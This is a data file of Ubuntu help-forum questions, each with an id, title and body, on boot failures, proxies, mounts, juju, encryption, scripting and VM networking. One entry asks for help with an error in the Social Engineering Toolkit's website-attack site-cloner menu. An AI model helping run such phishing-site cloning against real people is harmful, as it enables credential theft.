371432	how to troubleshoot booting to a black screen on virtualbox	i was using 13.04 as a guest os on my virtualbox 14.2.18 . host is windows 8 . after upgrade to 13.10 ubuntu does not start . i can see black screen and blinking cursor . can anyone help ? i am pretty new to ubuntu . my feeling is that it is somethign wrong with graphic drivers . i can access tty and all files ( /home ) are there . thank you
371435	i can not boot to ubuntu when i upgrade to 13.10 from 13.04	my notebook pc has windows7 and ubuntu13.04（ubuntu installed after win7），and use easybcd to manger the multi-boot。 now，i can not boot to ubuntu when i upgrade to 13.10 and restart pc . it stop at a black screen only has a flash point , no error message . who can give me some help ? thanks a lot .
371436	is there a good gide for internal mail server + roundcube set up	i 'd like to set up an ubuntu mail server with roundcube on top of it . how do i do this . what to install and how to configure it to send mails in a local network ?
371437	proxy with terminal	i 've set a global proxy from applications - > network so firefox has access . i 've followed 'apt-get ' does not work with proxy so apt-get also works . but if i try other commands which require the internet , for example wget , i generally get errors to the effect of : failed : connection timed out . how can i set everything to use the proxy ? there 's no other way to connect . tried bash -c export http_proxy='proxy_ip : port/ ' from no internet for terminal- connect through a proxy but no joy .
371444	mount a disk as /mydisk and show it in file browser as devices	my machine has 2 disk . the second disk mounts ok in the file browser in the device section but its mount path is in /media/machine/mydisk which is a pain when one want to acces files within mydisk using command line . to solve this i added an entry in fstab with a short path ( /data/ leads to my disk ) . /dev/sda1 /data ext4 rw , auto 0 2 problem is , after i did this , my disk does n't appear anymore in my file browser ( which is handy in mouse mode ) , and the only way to access it is through /data/ question is : how can i have my disk mounted in /data/ and apear in ubuntu file browser as a disk in the device section ?
371445	ubuntu 13.10 does not work how can i return to ubuntu 13.04 ?	i recently intalled ubuntu 13.04 , which i liked very much , and after a while a window appears asking to upgrade to ubuntu 13.10 , which i did . after re-starting computer , ubuntu did not work ! i would like to return to 13.04 . how can i do that . i would like to remove ubuntu 13.10 from grub .
371455	is there any anti-theft / robber-spy application on ubuntu touch ?	theft application on ubuntu touch saucy which could help protect my tablet/phone ? i mean an application running as daemon on back-end and waiting for remote activation . activated by an gps event , gsm cell name , text/script on website , trough my private vpn or by remote shell connection , or user behavioural pattern . application logging gps location , sending photos from the front-end camera , streaming sound , watching public wifi hotspots to send the data to home . all in accordance with the law , but actively . only in case of theft of my lovely gadget .
371460	problem with install oxygen-transparent theme on kubuntu	i would like to install oxygen-transparent theme on kubuntu 12.04 . ( the kde version is 4.11.2 ) to install that : sudo apt-get install build-essential cmake kdelibs5-dev and then : sudo apt-get install kdebase-workspace-dev libxrender-dev libx11-dev git above command get me an error : reading package lists ... done building dependency tree reading state information ... done git is already the newest version . libx11-dev is already the newest version . libx11-dev set to manually installed . libxrender-dev is already the newest version . some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : kdebase-workspace-dev : depends : kde-workspace-dev but it is not going to be installed e : unable to correct problems , you have held broken packages . please tell me what am i missing here ? any helps would be appreciated .
371463	2 terra byte data loss please help	i have 2 hard disks 1 is 2 tb another one is 500 gb . in 2 tb it was installed with windows 8 & 500 gb is with windows 7 . in 2 tb hard disk i have 2 partitions one is 200 gb another is 1.8 tb i keep my all personal data in 1.8 tb . as i have more free space i shrink 1.8 tb through windows disk management and created a partition with approx 100 gb ( not exactly ) . now i was started to install ubuntu 10.3 on my 2 tb drive in the partition which i was created with 100 gb . here my mistake is i hasnât read or go through any references regarding how to install ubuntu . so i have no knowledge about file system of ubuntu . in installation process i has selected my 2tb hard drive and selected one option like sdb1/sdb1 may be and it is asked for an option i.e . is alongside windows or some other options also is there but i selected `` alongside '' and completed installation process of ubuntu 10.3 . now after reboot i cant get my 2tb disk data invisible . when i checked in disks option in ubuntu its showing 2 tb as one single partition and ubuntu is installed in that , and the file system is ext4 . there are two more partitions one is 100 mb microsoft reserved and another is 3gb swap . but i cant get my 1.8 tb partition in the list . i do n't know what 's going wrong with me . i have also tried booting with windows 7 which was installed on 500 gb . the 2tb hd is showing partitions as shown in ubuntu and the `` assign drive letter '' option is hideout . i dont know what to do now . please help to retrieve my 1.8 tb partition . thanks in advance .
371466	how much memory needs the kernel ?	how much memory is needed so the kernel can be loaded in the memory ?
371469	odd behavior : can not select the update sources	oddly enough , they all look unselected - i do not know that this is really true , but they look like they are not selected . but most odd is that selecting them is impossible - as seen here . this seemed to have something to do with this error ( update duplicate source ) : w : duplicate sources.list entry http : //security.ubuntu.com/ubuntu/ precise-security/restricted i386 packages ( /var/lib/apt/lists/security.ubuntu.com_ubuntu_dists_precise-security_restricted_binary-i386_packages ) w : duplicate sources.list entry http : //security.ubuntu.com/ubuntu/ precise-security/main i386 packages ( /var/lib/apt/lists/security.ubuntu.com_ubuntu_dists_precise-security_main_binary-i386_packages ) i have commented the entries involved in /etc/apt/sources.list and now sudo apt-get update gives no errors anymore . but the odd behavior continues . i have recreated this quiestion on u & l - here - so better close this as off-topic but maybe keep it for reference .
371472	how do i configure sound devices in skype 4.2 on 12.04 x64 ?	i got a new pc and installed the 64-bit version of ubuntu 12.04 to utilize all of the 8gb of ram and the apu to the max . so far everything works except sound in skype 4.2 . i ca n't snap the whole list of devices offered because both screencloud and ubuntu 's screenshotter refuse to snap when the list is active , but i intentionally used different entries for the speakers and ringing devices . the others offered are on the same basis , all `` digital '' ( unlike the analog choice i have for the microphone which i am pretty sure would work ) . it 's a realtek hd sound card , integrated , pretty common on today 's mobos . anyone has a clue about what could be wrong ? i 'm pretty sure the skype login sound was there two days ago , it 's since this morning i noticed that it 's gone . thanks in advance !
371476	space ( and pipe sign ) works on occasion only	i have an issue that when i try to write pipe sign `` | '' and space after that , i sometimes get wrong type of space ( \240 ) and my command fails . this issue persists on different shells . how could i fix this ? i am using finnish keyboard layout . timo @ timo-i7-ubuntu : ~ $ ps -ef | grep ruby timo 7169 2633 0 12:12 pts/2 00:00:00 ruby1.9.1 /usr/local/bin/rails new admin4 timo 8736 26515 0 14:22 pts/4 00:00:00 grep -- color=auto ruby timo @ timo-i7-ubuntu : ~ $ ps -ef | grep ruby no command ' grep ' found , did you mean : command 'igrep ' from package 'openimageio-tools ' ( universe ) command 'dgrep ' from package 'debian-goodies ' ( main ) command 'rgrep ' from package 'grep ' ( main ) command 'zgrep ' from package 'gzip ' ( main ) command 'zgrep ' from package 'zutils ' ( universe ) command 'sgrep ' from package 'sgrep ' ( universe ) command 'lgrep ' from package 'lv ' ( universe ) command 'egrep ' from package 'grep ' ( main ) command 'ngrep ' from package 'ngrep ' ( universe ) command 'grep ' from package 'grep ' ( main ) command 'agrep ' from package 'agrep ' ( multiverse ) command 'pgrep ' from package 'procps ' ( main ) command 'xgrep ' from package 'xgrep ' ( universe ) command 'vgrep ' from package 'atfs ' ( universe ) command 'fgrep ' from package 'grep ' ( main ) grep : command not found timo @ timo-i7-ubuntu : ~ $ cat pipecom ps -ef | grep rails timo @ timo-i7-ubuntu : ~ $ cat pipecom2 ps -ef | grep rails timo @ timo-i7-ubuntu : ~ $ ./pipecom timo 7169 2633 0 12:12 pts/2 00:00:00 ruby1.9.1 /usr/local/bin/rails new admin4 timo 8777 8775 0 14:26 pts/4 00:00:00 grep rails timo @ timo-i7-ubuntu : ~ $ ./pipecom2 ./pipecom2 : line 1 : $ '\302\240grep ' : command not found timo @ timo-i7-ubuntu : ~ $ diff -w pipecom pipecom2 1c1 < ps -ef | grep rails -- - > ps -ef | grep rails
371477	juju unable to remove relation	i am trying to remove and re add the relation between openstack-dashboard and the identity service . i have 2 units of the dashboard service and i have made an ha cluster out of it , and also i have 2 units of the identity service with the ha cluster subordinate charm . all 4 units are in the `` started '' sate , not in error state . i try running running the following command : xsmaas01 : ~ $ sudo juju remove-relation openstack-dashboard keystone -- debug [ sudo ] password for sonali : 2013-11-05 12:31:11 debug juju.provider.maas environprovider.go:32 opening environment `` maas '' . 2013-11-05 12:31:11 debug juju state.go:160 waiting for dns name ( s ) of state server instances [ /maas/api/1.0/nodes/node-bc3afec8-19f2-11e3-8cf9-c6d6cdbfe570/ ] 2013-11-05 12:31:11 info juju.state open.go:68 opening state ; mongo addresses : [ `` jujuzk.master:37017 '' ] ; entity `` '' 2013-11-05 12:31:11 info juju.state open.go:106 connection established 2013-11-05 12:31:11 info juju supercommand.go:286 command finished and in juju debug-log i see this : jujuzk:2013-11-05 12:30:41 debug juju codec.go:103 rpc/jsoncodec : < - { `` requestid '' :37 , '' type '' : '' pinger '' , '' request '' : '' ping '' , '' params '' : { } } jujuzk:2013-11-05 12:30:41 debug juju codec.go:168 rpc/jsoncodec : - > { `` requestid '' :37 , '' response '' : { } } jujuzk:2013-11-05 12:30:41 debug juju codec.go:103 rpc/jsoncodec : < - { `` requestid '' :37 , '' type '' : '' pinger '' , '' request '' : '' ping '' , '' params '' : { } } jujuzk:2013-11-05 12:30:41 debug juju codec.go:168 rpc/jsoncodec : - > { `` requestid '' :37 , '' response '' : { } } opdashboard01:2013-11-05 12:31:23 debug juju filter.go:311 worker/uniter/filter : got relations change opdashboard01:2013-11-05 12:31:23 debug juju filter.go:339 worker/uniter/filter : sent relations event opdashboard01:2013-11-05 12:31:23 info juju uniter.go:350 worker/uniter : running `` identity-service-relation-departed '' hook opdashboard01:2013-11-05 12:31:23 info juju context.go:174 worker/uniter : skipped `` identity-service-relation-departed '' hook ( not implemented ) opdashboard01:2013-11-05 12:31:23 info juju uniter.go:358 worker/uniter : ran `` identity-service-relation-departed '' hook opdashboard01:2013-11-05 12:31:23 info juju uniter.go:365 worker/uniter : committing `` relation-departed '' hook opdashboard01:2013-11-05 12:31:23 info juju uniter.go:383 worker/uniter : committed `` relation-departed '' hook opdashboard01:2013-11-05 12:31:23 info juju uniter.go:350 worker/uniter : running `` identity-service-relation-departed '' hook opdashboard01:2013-11-05 12:31:23 info juju context.go:174 worker/uniter : skipped `` identity-service-relation-departed '' hook ( not implemented ) opdashboard01:2013-11-05 12:31:23 info juju uniter.go:358 worker/uniter : ran `` identity-service-relation-departed '' hook opdashboard01:2013-11-05 12:31:23 info juju uniter.go:365 worker/uniter : committing `` relation-departed '' hook opdashboard01:2013-11-05 12:31:23 info juju uniter.go:383 worker/uniter : committed `` relation-departed '' hook opdashboard01:2013-11-05 12:31:23 info juju uniter.go:350 worker/uniter : running `` identity-service-relation-broken '' hook opdashboard01:2013-11-05 12:31:23 info juju context.go:174 worker/uniter : skipped `` identity-service-relation-broken '' hook ( not implemented ) opdashboard01:2013-11-05 12:31:23 info juju uniter.go:358 worker/uniter : ran `` identity-service-relation-broken '' hook opdashboard01:2013-11-05 12:31:23 info juju uniter.go:365 worker/uniter : committing `` relation-broken '' hook opdashboard01:2013-11-05 12:31:23 info juju uniter.go:383 worker/uniter : committed `` relation-broken '' hook opks03:2013-11-05 12:31:33 info juju uniter.go:350 worker/uniter : running `` identity-service-relation-departed '' hook opks03:2013-11-05 12:31:33 info juju context.go:174 worker/uniter : skipped `` identity-service-relation-departed '' hook ( not implemented ) opks03:2013-11-05 12:31:33 info juju uniter.go:358 worker/uniter : ran `` identity-service-relation-departed '' hook opks03:2013-11-05 12:31:33 info juju uniter.go:365 worker/uniter : committing `` relation-departed '' hook opks03:2013-11-05 12:31:33 debug juju filter.go:311 worker/uniter/filter : got relations change opks03:2013-11-05 12:31:33 info juju uniter.go:383 worker/uniter : committed `` relation-departed '' hook opks03:2013-11-05 12:31:33 debug juju filter.go:339 worker/uniter/filter : sent relations event opks03:2013-11-05 12:31:33 info juju uniter.go:350 worker/uniter : running `` identity-service-relation-departed '' hook opks03:2013-11-05 12:31:33 info juju context.go:174 worker/uniter : skipped `` identity-service-relation-departed '' hook ( not implemented ) opks03:2013-11-05 12:31:33 info juju uniter.go:358 worker/uniter : ran `` identity-service-relation-departed '' hook opks03:2013-11-05 12:31:33 info juju uniter.go:365 worker/uniter : committing `` relation-departed '' hook opks03:2013-11-05 12:31:33 info juju uniter.go:383 worker/uniter : committed `` relation-departed '' hook opks03:2013-11-05 12:31:33 info juju uniter.go:350 worker/uniter : running `` identity-service-relation-broken '' hook opks03:2013-11-05 12:31:33 info juju context.go:174 worker/uniter : skipped `` identity-service-relation-broken '' hook ( not implemented ) opks03:2013-11-05 12:31:33 info juju uniter.go:358 worker/uniter : ran `` identity-service-relation-broken '' hook opks03:2013-11-05 12:31:33 info juju uniter.go:365 worker/uniter : committing `` relation-broken '' hook opks03:2013-11-05 12:31:33 info juju uniter.go:383 worker/uniter : committed `` relation-broken '' hook opdashboard02:2013-11-05 12:31:26 debug juju filter.go:311 worker/uniter/filter : got relations change opdashboard02:2013-11-05 12:31:26 debug juju filter.go:339 worker/uniter/filter : sent relations event opdashboard02:2013-11-05 12:31:26 info juju uniter.go:350 worker/uniter : running `` identity-service-relation-departed '' hook opdashboard02:2013-11-05 12:31:26 info juju context.go:174 worker/uniter : skipped `` identity-service-relation-departed '' hook ( not implemented ) opdashboard02:2013-11-05 12:31:26 info juju uniter.go:358 worker/uniter : ran `` identity-service-relation-departed '' hook opdashboard02:2013-11-05 12:31:26 info juju uniter.go:365 worker/uniter : committing `` relation-departed '' hook opdashboard02:2013-11-05 12:31:26 info juju uniter.go:383 worker/uniter : committed `` relation-departed '' hook opdashboard02:2013-11-05 12:31:26 info juju uniter.go:383 worker/uniter : committed `` relation-departed '' hook opdashboard02:2013-11-05 12:31:26 info juju uniter.go:350 worker/uniter : running `` identity-service-relation-broken '' hook opdashboard02:2013-11-05 12:31:26 info juju context.go:174 worker/uniter : skipped `` identity-service-relation-broken '' hook ( not implemented ) opdashboard02:2013-11-05 12:31:26 info juju uniter.go:358 worker/uniter : ran `` identity-service-relation-broken '' hook opdashboard02:2013-11-05 12:31:26 info juju uniter.go:365 worker/uniter : committing `` relation-broken '' hook opdashboard02:2013-11-05 12:31:26 info juju uniter.go:383 worker/uniter : committed `` relation-broken '' hook opdashboard02:2013-11-05 12:31:26 info juju uniter.go:350 worker/uniter : running `` identity-service-relation-departed '' hook opdashboard02:2013-11-05 12:31:26 info juju context.go:174 worker/uniter : skipped `` identity-service-relation-departed '' hook ( not implemented ) opdashboard02:2013-11-05 12:31:26 info juju uniter.go:358 worker/uniter : ran `` identity-service-relation-departed '' hook opdashboard02:2013-11-05 12:31:26 info juju uniter.go:365 worker/uniter : committing `` relation-departed '' hook opks01:2013-11-05 12:32:19 debug juju filter.go:311 worker/uniter/filter : got relations change jujuzk:2013-11-05 12:31:32 debug juju codec.go:103 rpc/jsoncodec : < - { `` requestid '' :38 , '' type '' : '' pinger '' , '' request '' : '' ping '' , '' params '' : { } } jujuzk:2013-11-05 12:31:32 debug juju codec.go:168 rpc/jsoncodec : - > { `` requestid '' :38 , '' response '' : { } } jujuzk:2013-11-05 12:31:38 debug juju codec.go:103 rpc/jsoncodec : < - { `` requestid '' :13 , '' type '' : '' pinger '' , '' request '' : '' ping '' , '' params '' : { } } jujuzk:2013-11-05 12:31:38 debug juju codec.go:168 rpc/jsoncodec : - > { `` requestid '' :13 , '' response '' : { } } jujuzk:2013-11-05 12:32:31 debug juju codec.go:103 rpc/jsoncodec : < - { `` type '' : '' client '' , '' request '' : '' setannotations '' , '' params '' : { `` tag '' : '' service-openstack-dashboard '' , '' pairs '' : { `` gui-x '' : '' 1917.0029802730883 '' , '' gui-y '' : '' -470.82699030543813 '' } } , '' requestid '' :41 } jujuzk:2013-11-05 12:32:31 debug juju codec.go:168 rpc/jsoncodec : - > { `` requestid '' :41 , '' response '' : { } } jujuzk:2013-11-05 12:32:32 debug juju codec.go:103 rpc/jsoncodec : < - { `` requestid '' :39 , '' type '' : '' pinger '' , '' request '' : '' ping '' , '' params '' : { } } jujuzk:2013-11-05 12:32:32 debug juju codec.go:168 rpc/jsoncodec : - > { `` requestid '' :39 , '' response '' : { } } jujuzk:2013-11-05 12:32:35 debug juju codec.go:168 rpc/jsoncodec : - > { `` requestid '' :5 , '' response '' : { `` deltas '' : [ [ `` annotation '' , '' change '' , { `` tag '' : '' service-openstack-dashboard '' , '' annotations '' : { `` gui-x '' : '' 1917.0029802730883 '' , '' gui-y '' : '' -470.82699030543813 '' } } ] ] } } jujuzk:2013-11-05 12:32:35 debug juju codec.go:103 rpc/jsoncodec : < - { `` type '' : '' allwatcher '' , '' request '' : '' next '' , '' id '' : '' 1 '' , '' params '' : { } , '' requestid '' :42 } but still i can see relation still exists . also , if re-add relation it says relation already exists , so it can not add the relation . what could be wrong ?
371483	how do i change the default .htm file icon ?	i really enjoy the look of ubuntu . the only thing that i want to change is the default icon used for .html ( .htm ) files . i want to use the icon /usr/lib/firefox/browser/icons/mozicon128.png instead . i do not want to change any other visual element . is there a practical way to accomplish this small change ? edit : @ mitch , i 've used assogiate in the past and although i was able to change the icon used for .mht files , i could not get it to change the .htm icon . @ anwar shah , thanks for the information . i wish that it would work for me . running 13.10 x86 , after i do the copy of the icons , in the folders are a bunch of links to .svg files not actual graphics files . it appear that the second copy actually went into /usr/share/icons/humanity/mimes/ ... and replaced the links there with the renamed .png files . i hope that nothing too weird happens as a result . i have rebooted a couple of times and nothing seems amiss , but no firefox icons for the .htm files yet either .
371484	black screen on boot . failsafex : `` screen not found ''	i made a regular update using update center yesterday on my samsung np730u3e with ubuntu gnome 13.10 and today it wo n't start . or rather : it just gives me a black screen . on start up i get to enter my encryption password and everything seems fine . but after the encryption password is accepted it just blanks out . when i boot into recovery mode and try to boot failsafex it returns `` fatal server error : ( ee ) no screens found ( ee ) '' after booting into recovery mode and `` resume normal boot '' i get to the tty1 prompt . if i head over to `` tty7 '' , where the graphical things usually are going on i just see this ( and it 's frozen ) : what to do ?
371486	ubuntu hard blocked my wireless	originally i had windows 8 and decided to dual boot with ubuntu . i really liked ubuntu so i removed windows 8 and am now only running ubuntu . the wireless was working fine untill i rebooted my computer , now it wont recognize any wifi access points . when i typed `` rfkill list all '' everything is unblocked except phy0 witch is hard blocked . i tried `` rfkill unblock all '' and that didnt work , ive also tried a few other terminal commands but nothing seems to work . it works if i have my laptop plugged into the internet with a wired connection ( witch is what im using now ) please help me with this problem .
371487	is it safe to format msftres , msftdata and hidden partitions ?	i have an acer v7 which came with a 1tb hdd , 24gb ssd and windows 8 installed . i have installed ubuntu onto the ssd and formatted the main partitions of the hdd . however , i also notice 3 other partitions on the hdd marked msftres , msftdata . is it safe to format these also so that i have one contiguous drive partition or will i be wiping something important like boot or bios data ?
371488	how to start developing for ubuntu	i would like to learn how to develop a multi-clipboard application for unity , similar to diodon , for learning purposes . can you give me a link or some direction to get started ? i have generic programming skills but i think i can do it ! : d hope you can help and that i 'm not off topic .
371489	` [ errno 2 ] no such file or directory` while using social engineering toolkit	i have recently downloaded social engineering toolkit ( set ) for ubuntu 13.04 32-bit . i have installed its subversions , jave 6 and ettercap . but i do not have metasploit because the download size is big ( i have mobile wap connection bit slow ) . and metasploit is not concerned with set . i am using ubuntu 13.04 i have downloaded set in ubuntu when i start set like the one below : wolf @ conjuring : ~ $ cd set wolf @ conjuring : ~/set $ sudo ./set [ sudo ] password for wolf : < .. > [ ! ] website attack vectors [ ! ] 1 . web templates 2 . site cloner 3 . custom import 4 . return to main menu enter number ( 1-4 ) : 2 something went wrong , printing the error : [ errno 2 ] no such file or directory : 'src/program_junk/attack_vector' ^^^^
371493	how do i sort packages	i 'm trying to remove some packages that i installed a long time ago but do n't need any more , when i type dpkg -- get-selection i get a list of all the packages installed in my system , but i need to sort those packages , like this `` the packages needed by the system all together '' , `` packages that can be removed all together '' . is there any command that can sort them for me ? ?
371495	12.04 , kernel 3.2.0-55 & cryptsetup	i am running into a problem regarding the following setup : partitions : /dev/sde1 cryptswap /dev/sde2 cryptroot |_ /dev/vg_root/lv_root / |_ /dev/vg_root/lv_usr /usr/local |_ /dev/vg_root/lv_tmp /tmp |_ /dev/vg_root/lv_home /home /dev/md0 cryptvmx |_ /dev/vg_root/lv_vmx /vmx /dev/sdf1 /boot /dev/sdf is a usb key containing an un-encrypted ext4 partition used to hold the grub boot loader , initramfs & kernels . the initramfs then prompts to unlock the cryptroot , cryptswap & cryptvmx partitions specified in the following configuration files : /etc/crypttab cryptroot /dev/sde5 none luks , retry=3 cryptswap /dev/sde1 none luks , retry=3 cryptvmx /dev/md0 none luks , retry=3 /etc/initramfs-tools/conf.d/cryptroot cryptroot=target=cryptroot , source=/dev/sde5 , lvm=vg_root , lvm=lv_root while this setup will work fine when booting to the vmlinuz-3.2.23-generic kernel , i am running into problem when using any of the kernels with versions vmlinuz-3.2.54-generic & vmlinuz-3.2.55-generic . i am uncertain on how to proceed to remedy the problem . both of the kernels i am having problems with will load the system drivers , initialize the hardware & the then load initramfs without a problem . the initramfs when prompting for the passphrase to begin unlocking the drives seems to change tty 's as i am unable to utilize the prompt either from the ui or from the text based loaders . any assistance is appreciated .
371498	opening and controlling a window over ssh	i have a raspberry pi to which a monitor is connected . i have ssh 'd into this raspberry pi from another box . what i want to do now is : open a window ( ie a browser ) on the monitor connected to the raspberry pi be able to interact with this window using the mouse and keyboard connected to the box i am using all via the box from which i 've ssh 'd into the raspberry pi . what is the simplest way to do this ?
371504	autostart not working on ubuntu 12.04	when i put a task.desktop file under my ~/.config/autostart/ , it works ok ( the script run after login . in this case the autostart folder already exists . on another machine , the autostart folder was missing , so after i created one and proceeded like above , the script does n't run . what can be the causes of this problem ? in both cases i 'm running ubuntu 12.04 lts and the file permissions are ok also . the script is a simple python , i do n't think is matters . thanks for any help !
371508	items randomly disappear from top bar	i keep losing random items such as the clock and the power off/settings icon . what do i do ?
371509	location and name of ftp log files	a vendor is transfering files via ftp to our location via ftp and claims that they did send us the files . where can i find the ftp log files and what are they called ?
371511	folders from the sidebar are not showing	how do i restore the folders that were showing on the sidebar and the general folder look . i only see the content not the folder ! please advise
371512	how to enable gstreamer for firefox 25.0 ubuntu 13.10	i try to make a javascript where i need to test the ability of playing `` video/mp4 '' . i do that with : var video = document.createelement ( 'video ' ) ; video.canplaytype ( 'video/mp4 ' ) ; but my firefox ( version 25.0 / ubuntu 13.10 ) returns empty string . according the bug i opend on bugzilla : https : //bugzilla.mozilla.org/show_bug.cgi ? id=934947 ( second comment ) i need to enable gstreamer . but i dont't know how to do that .
371516	ca n't get list of files	when i click on folder , it says to me `` openid transaction in progress '' and button `` continue '' . is it my network issue ? and when i press `` continue '' button it goes on https : //one.ubuntu.com/files/api/view/f/mail for e.g . here is screenshot :
371517	root user 'access is denied ' error	i started to install oracle 11gr2 edition on ubuntu 13.04 and the last step i must start this command cd /home/user/desktop/oracle11g/ ./runinstaller there is 'access is denied ' error . i have same error with root user.help me this is the last step
371518	restricting wine to run specified commands only	i would like to restrict wine to run only some specified commands , for example : $ wine `` z : \data\my_app\file.exe '' but restrict to run all other commands with wine to prevent users from installing their apps . i know , they may change z : \ mounting in wine configuration and do it , but it is not a problem at this time . i tried it with /etc/sudoers , but it did not work : % users all= ( all ) /usr/bin/wine z : \data\my_app\file.exe , ! /usr/bin/wine any idea how can i achieve this restriction ?
371521	have dual-boot ubuntu 13.10/windows 8.1	i have a win 7 sp1/ubuntu 13.10 dual-boot , i 'm so bored with windows 7 after years and now i want to install windows 8.1 . my question is : is it possible to install windows 8.1 to dual-boot with ubuntu ? and how ? ( i think after installing windows 8.1 grub do n't works ! is it real ? any body did it ?
371522	how to mount a nikon coolpix p520 on 12.04 lts 64bit ?	my camera does n't work anymore in the ubuntu 12.04 lts . when i using the 32 bit version it 's great , but now in the 64 bit does n't work .
371524	how to stop/kill `` usr/share/python usr/share/apport/apport ''	i have this process '' usr/share/python usr/share/apport/apport '' i can not kill it by pid as the pid is changing to fast as the process keep restarting .
371530	ubuntu 13.10 numeric pad type wrong numbers	after upgrading to 13.10 my numeric pad type number 1 instead of 7 , number 2 instead of 8 and number 3 instead of 9 , numbers 4,5 and 6 are ok. any idea ?
371532	cloning ubuntu installation without needing a grub2 reinstall ?	is there any software out there that would allow a ubuntu hard drive to be cloned without needing to reinstall grub after installation ?
371534	why the apache2 has multiply pid ?	this is the command ps -a |grep -i apache2 output : xxxx @ debian : ~ $ ps -a |grep -i apache2 2362 ? 00:00:01 apache2 2365 ? 00:00:00 apache2 2367 ? 00:00:00 apache2 2369 ? 00:00:00 apache2 which is the correct pid when i use killcommand ?
371541	how to remove ubuntu compleletly from my laptop and install windows ?	i have bought an laptop with ubuntu version 12.04 and i want to remove it completely from laptop and install windows but i ca n't and i do n't know how to uninstall it , so could anyone tell me please how to remove it ?
371547	sed problem with scripting	i am trying to run a script using sed i runing like this for et in 1 # 2 3 do if [ -d et $ et ] ; then rm -rf et $ et ; fi mkdir et $ et cd et $ et cp $ home/step_ $ i/fde/diabata/run.adf . cp $ home/step_ $ i/fde/diabata/mas $ i.xyz . awk1=`awk '/type=fde/ { print nr } ' run.adf | head -1` awk2=` $ ( echo `` $ a+379 '' | bc -l ) ` sed -n `` $ awk1 , '' $ awk2 '' p '' run.adf > first awk3=`awk '/atoms/ { print nr +1 } ' first` awk4=`cat mas $ i.xyz | wc -l` awk4= $ ( echo `` $ awk4-1 '' | bc -l ) awk5=`awk `` /atoms/ { print nr + '' $ { awk4 } '' } '' run.adf` sed -n `` $ awk3 , '' $ awk4 '' p '' first > atoms par= $ ( echo `` $ awk4-99 '' | bc -l ) rho1= $ ( cat atoms | head -34 ) rho2= $ ( cat atoms | head -64 | tail -31 ) rho3= $ ( cat atoms | head -97 | tail -33 ) rhoall= $ ( cat atoms | tail - $ { par } ) echo -e `` $ rho1\n $ rho2\n $ rhoall '' > eje done but is telling me this : ( standard_in ) 1 : syntax error sed : -e expression # 1 , char 6 : unexpected ` , ' sed : -e expression # 1 , char 1 : unknown command : ` , ' please , i appreciate any help with this issue ... thanks pablo
371548	building lirc package from source with patches	i 'd like to build latest lirc package for 12.04 with two patches from here to make usb infrared toy v2 work : running sudo apt-build source lirc gave me â build ll total 960 drwxr-xr-x 10 root root 4096 nov 5 07:07 lirc-0.9.0 -rw-r -- r -- 1 root root 113909 may 5 2011 lirc_0.9.0-0ubuntu1.debian.tar.gz -rw-r -- r -- 1 root root 1553 may 5 2011 lirc_0.9.0-0ubuntu1.dsc -rw-r -- r -- 1 root root 857286 may 5 2011 lirc_0.9.0.orig.tar.bz2 in /var/cache/apt-build/build . running sudo apt-build build-source lirc then gave me some error occured building package which is not really informative . i have successfully built patched lirc from git source but now i would like to get a deb package . where can i look for this 'some errors ' in detail ? this error appears regardless of patches applied or not . if someone could suggest another way of building latest lirc package i will really appreciate .
371553	ping access to a nested vm ! ! plz help	i have a problem in communication between the host and the nested vm . this is my layout . i have installed kvm on host machine having a single nic interface ( public ip ) running ubuntu . on top of this , i have vm running ubuntu . i have installed kvm in this vm too . i then have a vm inside this running a web server . i am able to ping the host from this web server vm and ssh into it . but from host to vm , ping is being unsuccessful . the vm ( named l1hyp ) on host was created using libvirt-manager and has ip of 192.168.122.8 . the vswitch interface created at host is in default config ( nat-ed ) . its ip is 192.168.122.1 . now this vm is also having a vswitch interface which is in default config ( nat-ed ) .its ip is 192.168.100.1 . the web server vm is created on top of this l1hyp vm , is having an ip of 192.168.100.186 . the webserver vm uses 192.168.100.1 as its default gw . the l1hyp uses 192.168.122.1 as its default gw . from host : ping 192.168.122.8 - succeeds ping 192.168.122.1 - succeeds ping 192.168.100.1 - succeeds ping 192.168.100.186 - fails comes up with destination host unreachable from 192.168.122.1 . but there is a route to 192.168.100.0/24 subnet from host . ping to 192.168.100.1 succeeds . from webserver vm : ping 192.168.100.1 - succeeds ping 192.168.122.1 - succeeds ssh from web server vm to host succeeds . can anyone help me out what needs to be modified to have two way communication between the host and webserver vm ? i am pondering over this problem for over a week now .
371556	newly updated ubuntu not loading in moniter .	i just recently upgraded from ubuntu 12.04 to ubuntu 12.10 . i installed the update and tried to boot from the newly installed version . as i booted in it would pop up the loading screen and then i would lose signal and it would say that there was no signal on my monitor . how do i fix this because i really want to use the new version but if it 's not going to work i 'll just forget about it . i can however boot into the old install and i works fine .
371557	how can i decrease dash icon size for 13.10 ?	i would like to know if and how i can change the icon size in dash . the icons are huge but i can re-size the unity bar icons ! please let me know cheers
371559	grub not showing on startup for windows 8.1 ubuntu 13.10 dual boot	ok , so i 'm such a newbie to ubuntu and i bought a windows 8 pre-installed laptop last month . i updated to windows 8.1 and then i thought about installing ubuntu as a dual boot so i could mess around and learn more about it . so i followed a youtube tutorial ( http : //www.youtube.com/watch ? v=djftvkglqfq ) and i got my stuff working fine . the first few times i booted i got the grub menu instead of my default hp boot os manager , and i was able to select my os . so i went to sleep and the next day i turned on my computer and the grub menu did not show up . i tried several times and it did n't automatically show up . in order for me to see the grub menu i had to turn on my pc and on start had to press esc to pause startup and press f9 to get boot options . then from there i had to pick from os boot , ubuntu , ubuntu ( yes there were two ubuntus available ) and a default efi file thingy . when i click the first ubuntu i get the grub menu ( i was too scared to try the second in case i screwed my laptop up ) and i can safely load ubuntu from there and use it ( although i do have to increase my brightness every time i load ubuntu because it somehow reduces my brightness to complete darkness on boot ) so my problem here is why is n't my grub showing on boot , after it worked on the first day ? my laptop is a hp touchsmart j-078ca . edit 1 : fyi i just switched to ubuntu livecd to check my installation and found out that one of my partition is flagged as msftres . here is a screenshot of my gparted on a livecd :
371561	external display suddenly not detected	i have a lenovo ideapad u410 running ubuntu desktop 13.04 . i have an external monitor that i connect to via hdmi , and it 's worked flawlessly for six months . i plug in my laptop , it detects the display . the `` change display '' key built into the laptop works for switching between the two screens . never any problems . this afternoon , when i reconnected my computer after taking it into another room for a bit , it did n't work . when i open up display settings , it ca n't detect the display . i tried disconnecting/reconnecting everything multiple times . and most strangely , that same `` change display '' key now behaves like a super key , opening the dash instead of toggling the display . nothing at all changed between when i plugged it in this morning and when it stopped working a few hours later . i tried xrandr , that does n't detect it either . anyone have any ideas ?
